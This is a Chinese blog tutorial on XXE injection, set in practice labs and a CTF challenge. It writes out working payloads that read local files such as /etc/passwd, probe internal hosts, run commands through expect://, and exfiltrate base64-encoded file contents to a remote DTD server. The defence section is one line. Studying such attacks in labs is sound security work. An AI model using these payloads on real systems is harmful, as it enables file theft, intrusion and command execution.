【WEB漏洞原理】XML&XXE利用检测绕过

过期的秋刀鱼-

已于 2023-12-17 11:29:24 修改

阅读量1.4k

点赞数 2

分类专栏： # Web安全文章标签： xml 安全 web安全网络安全

于 2023-09-14 22:19:42 首次发布

本文链接：https://blog.csdn.net/ZhaoSong_/article/details/132891865

版权

Web安全专栏收录该内容

20 篇文章

订阅专栏

文章目录

1、概述

1.1、XML概念

XML被设计为传输和存储数据，XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素，其焦点是数据的内容，其把数据从HTML分离，是独立于软件和硬件的信息传输工具。

XXE漏洞全称XMLExternal Entity Injection，即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害

XXE是XML的一个漏洞

XXE产生根本原因：网站接受XML数据，没有对xml进行过滤

1.2、XML与HTML的主要差异

XML被设计为传输和存储数据，其焦点是数据的内容。

HTML被设计用来显示数据，其焦点是数据的外观。

HTML旨在**显示信息，而XML旨在传输信息**。

1.3、XML代码示例

<!--文档类型定义-->
<!DOCTYPE note [	<!--定义此文档时note类型的文档-->
<!ELEMENT note (to,from,heading,body)>	<!--定义note元素有四个元素-->
<!ELEMENT to (#PCDATA)>			<!--定义to元素为"#PCDATA"类型-->
<!ELEMENT from (#PCDATA)>		<!--定义from元素为"#PCDATA"类型-->
<!ELEMENT head (#PCDATA)>		<!--定义head元素为"#PCDATA"类型-->
<!ELEMENT body (#PCDATA)>		<!--定义body元素为"#PCDATA"类型-->
]]]>

<!--文档元素-->
<note>
    <to>Dave</to>
    <from>Tom</from>
    <head>Reminder</head>
    <body>You are a good man</body>
</note>

2、靶场演示

2.1、Pikachu靶场–XML数据传输测试

-回显，玩法，协议，引入

玩法-1-读取文件

前提：读取的文件必须存在

<?xml version = "1.0"?>
<!DOCTYPE ANY [
		<!ENTITY xxe SYSTEM "file:///C:/tmp/1.txt">
]>
<x>&xxe;</x>

玩法-2-内网探针或攻击内网应用（触发漏洞地址）

<?xml version = "1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTYTY rabbit SYSTEM "http://192.168.8.3/1.php">
]>
<x>&rabbit;</x>

上面的ip地址假设就是内网的一台服务器的ip地址。还可以进行一个端口扫描，看一下端口是否开放

如果访问的文件不存在，会显示如下图的信息

玩法-3-RCE

该CASE是在安装expect扩展的PHP环境里执行系统命令

<?xml version = "1.0"?>
<!DOCTYPE ANY [
		<!ENTITY xxe SYSTEM "expect://id">
]>
<x>&xxe;</x>

id是对于的执行的命令。实战情况比较难碰到

引入外部实体DTD

<?xml version = "1.0"?>
<!DOCTYPE test [
		<!ENTITY % file SYSTEM "http://127.0.0.1/evil2.dtd">
		%file;
]>
<x>&send;</x>

把核心代码写入evil2.dtd内容如下：

<!ENTITY send SYSTEM "file:///C:/tmp/1.txt">

条件：看对方的应用有没有禁用外部实体引用，这也是防御XXE的一种措施

无回显-读取文件

先把靶场的回显代码注释掉

<?xml version = "1.0"?>
<!DOCTYPE test [
		<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=C:/tmp/1.txt">
		<!ENTITY % dtd SYSTEM "http://192.168.8.3:80/test.dtd">
		%dtd;
		%send;
]>

#读取C:/tmp/1.txt里的内容复制给 file
#然后去请求test.dtd

test.dtd：

<!ENTITY % payload
	"<!ENTITY &#x25; send SYSTEM
'http://192.168.8.3:80/?data=%file;'>"
>
%payload;


#去访问?data=上面读到的数据

开启phpstudy–apache日志

重启phpstudy，就有了一个access.log

然后攻击，无回显，查看日志

解码网站：https://www.bejson.com/enc/base64/

3、XXE绕过

CTF XXE

4、XXE检测

4.1、xxe-lab靶场

xxe-lab靶场登录框xml数据传输测试–检查发现

靶场地址：https://github.com/c0ny1/xxe-lab

请求头中如下：
    Content-Type: application/xml;
    或者
    Content-Type: text/xml;

Payload：

<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM "file:///C:/tmp/1.txt">
]>
<user><username>&test;</username><password>Mikasa</password></user>

4.2、CTF-Jarvis-OJ-Web-XXE

XXE安全真题复现–修改数据请求格式

地址：http://web.jarvisoj.com:9882/

点击Go!，BurpSuite拦截

数据包为json格式

修改Content-Type

提交Payload

<?xml version="1.0"?>
<!DOCTYPE  ANY [
<!ENTITY ss SYSTEM "file:///etc/passwd">
]>
<x>&ss;</x>

4.3、Vulnhub/XXE Lab: 1

靶场地址：XXE Lab: 1

下载地址：Download (Mirror)

5、XXEinjection工具

XXE安全漏洞自动化注射脚本工具

XXEinjector本身提供了非常非常丰富的操作选项，所以大家在利用XXEinjector进行渗透测试之前，请自习了解这些配置选项，以最大限度地发挥XXEinjector的功能。当然了，由于XXEinjector是基于Ruby开发的，所以Ruby运行环境就是必须的了。这里建议在kali环境下运行

工具地址：

https://github.com/enjoiz/XXEinjector
https://github.com/enjoiz/XXEinjector/archive/master.zip

工具使用：

https://www.cnblogs.com/bmjoker/p/9614990.html

git clone https://github.com/enjoiz/XXEinjector.git

6、XXE安全防御

php java python 过滤及禁用